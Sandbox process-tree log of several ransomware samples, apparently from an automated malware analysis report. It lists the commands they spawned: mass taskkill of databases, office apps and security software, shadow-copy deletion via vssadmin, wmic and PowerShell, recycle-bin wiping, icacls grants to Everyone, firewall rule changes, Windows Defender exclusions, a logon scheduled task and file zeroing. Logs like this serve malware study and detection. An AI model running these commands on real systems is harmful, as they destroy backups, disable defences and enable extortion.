C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
PID:8148
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
PID:8176
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
PID:1160
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:5044
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
PID:8128
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
PID:1980
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
PID:8188
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵PID:5664
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F4⤵
- Kills process with taskkill
PID:6148
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:6096
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
PID:3144
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
PID:4968
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
PID:1076
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
PID:8624
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵PID:9076
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes4⤵
- Modifies Windows Firewall
PID:5948
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:5992
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
PID:6132
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
PID:3144
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes4⤵
- Modifies Windows Firewall
PID:6664
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
PID:7992
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
PID:7856
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
PID:8276
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
PID:8380
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
PID:8572
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
PID:8792
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
PID:8036
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F4⤵
- Kills process with taskkill
PID:7588
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:936
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
PID:1912
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
PID:6540
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
PID:8580
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
PID:804
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
PID:8568
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
PID:3016
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
PID:8228
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:8832
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
PID:2576
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:8608
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
PID:6536
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
PID:2244
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
PID:5352
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
PID:7972
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes4⤵
- Modifies Windows Firewall
PID:13088
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵
- Modifies Windows Firewall
PID:9748
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
PID:10288
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
PID:15312
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
PID:12196
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
PID:12132
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
PID:11308
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F4⤵
- Kills process with taskkill
PID:13268
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F4⤵
- Kills process with taskkill
PID:11712
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F4⤵
- Kills process with taskkill
PID:15212
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F4⤵
- Kills process with taskkill
PID:14020
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes4⤵
- Modifies Windows Firewall
PID:14888
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F4⤵
- Kills process with taskkill
PID:12448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }4⤵PID:15332
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:8920
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:10940
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:9252
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes4⤵
- Modifies Windows Firewall
PID:5744
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a4⤵
- Network Service Discovery
PID:9624
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8828 -
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11804
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”5⤵PID:6920
-
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a4⤵
- Network Service Discovery
PID:13012
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exeHEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exe3⤵PID:1376
-
C:\windows\system32\sc.exe"C:\windows\system32\sc.exe" create defragsrv binpath= "C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exe" start= auto4⤵
- Launches sc.exe
PID:5316
-
-
\??\c:\windows\system32\cmd.exe"c:\windows\system32\cmd.exe" /c c:\windows\logg.bat4⤵PID:5184
-
-
\??\c:\Windows\system32\vssadmin.exe"c:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:6060
-
-
\??\c:\windows\system32\sc.exe"c:\windows\system32\sc.exe" create defragsrv binpath= "C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf.exe" start= auto4⤵
- Launches sc.exe
PID:6716
-
-
\??\c:\windows\system32\sc.exe"c:\windows\system32\sc.exe" start defragsrv4⤵
- Launches sc.exe
PID:5948
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-ef870eae64e28ebd71c8ad909af39ea9a072256bfd634210f4de24ded5a3304a.exeHEUR-Trojan-Ransom.Win32.Generic-ef870eae64e28ebd71c8ad909af39ea9a072256bfd634210f4de24ded5a3304a.exe3⤵PID:5476
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:7132
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵PID:7148
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-f0d099276b1818d43e167619fa096350372ac01178a7389cbe7b38bc2b1a27b9.exeHEUR-Trojan-Ransom.Win32.Generic-f0d099276b1818d43e167619fa096350372ac01178a7389cbe7b38bc2b1a27b9.exe3⤵PID:5312
-
C:\Users\Admin\AppData\Local\Temp\advisory-on-covid-19-for-businesses.exe"C:\Users\Admin\AppData\Local\Temp\advisory-on-covid-19-for-businesses.exe"4⤵PID:6820
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\advisory-on-covid-19-for-businesses.pdf"4⤵PID:5936
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵PID:7448
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3CE2BA3588B328118282091776E31316 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3CE2BA3588B328118282091776E31316 --renderer-client-id=2 --mojo-platform-channel-handle=1676 --allow-no-sandbox-job /prefetch:16⤵PID:7848
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A050143D1F0BEEB3A1245A2406C98E5D --mojo-platform-channel-handle=1948 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:7880
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1349BA9218D55CD8BA26CA9F7A05BE00 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1349BA9218D55CD8BA26CA9F7A05BE00 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:16⤵PID:7620
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=09CA7F7B7AC086D45D6CB3F23CF11C7E --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:9208
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8B09304749EEDD63B030553823CB0CB4 --mojo-platform-channel-handle=2732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:7176
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3147AAA4F2FCAD8075C3DF38E3EEE31B --mojo-platform-channel-handle=2836 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:8664
-
-
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\monyet.jpg" /ForceBootstrapPaint3D4⤵PID:5400
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-f50ba2fd7e441ef2bffeb6355d33f367248097351d0fa42932c59c6dd26557b5.exeHEUR-Trojan-Ransom.Win32.Generic-f50ba2fd7e441ef2bffeb6355d33f367248097351d0fa42932c59c6dd26557b5.exe3⤵PID:6864
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive4⤵PID:6256
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive4⤵PID:292
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic SHADOWCOPY DELETE /nointeractive4⤵PID:7912
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-ff31bd728a0a809949eac3cb635fcdc283c5b191428e93e0065ef903e27bbabd.exeHEUR-Trojan-Ransom.Win32.Generic-ff31bd728a0a809949eac3cb635fcdc283c5b191428e93e0065ef903e27bbabd.exe3⤵PID:6948
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exeHEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe3⤵PID:4232
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exeHEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe4⤵PID:3340
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\d821e19d-49b5-44ce-ae2b-8585486cebe6" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
PID:7604
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe"C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:7304
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe"C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Stop.gen-16100415ba4415eb4ebcc61c47931181d6b331645047a1733b7daec6ef0c9498.exe" --Admin IsNotAutoStart IsNotTask6⤵PID:7872
-
-
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan.MSIL.Cryptos.gen-729c4ae63b32e07bd96328f7822f17d89d7b56af495007acf05bd802ab650704.exeHEUR-Trojan.MSIL.Cryptos.gen-729c4ae63b32e07bd96328f7822f17d89d7b56af495007acf05bd802ab650704.exe3⤵PID:5432
-
C:\Users\Admin\AppData\Roaming\Reg.exe"C:\Users\Admin\AppData\Roaming\Reg.exe"4⤵PID:7316
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit5⤵PID:7800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'6⤵
- Command and Scripting Interpreter: PowerShell
PID:6148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
PID:2164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' & exit5⤵PID:8716
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:9960
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"5⤵PID:11248
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit6⤵PID:10628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'7⤵
- Command and Scripting Interpreter: PowerShell
PID:13316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
- Command and Scripting Interpreter: PowerShell
PID:9428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
- Command and Scripting Interpreter: PowerShell
PID:14780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Services32.exe"C:\Users\Admin\AppData\Local\Temp\Services32.exe"5⤵PID:13060
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit6⤵PID:13076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00440'7⤵
- Command and Scripting Interpreter: PowerShell
PID:12388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
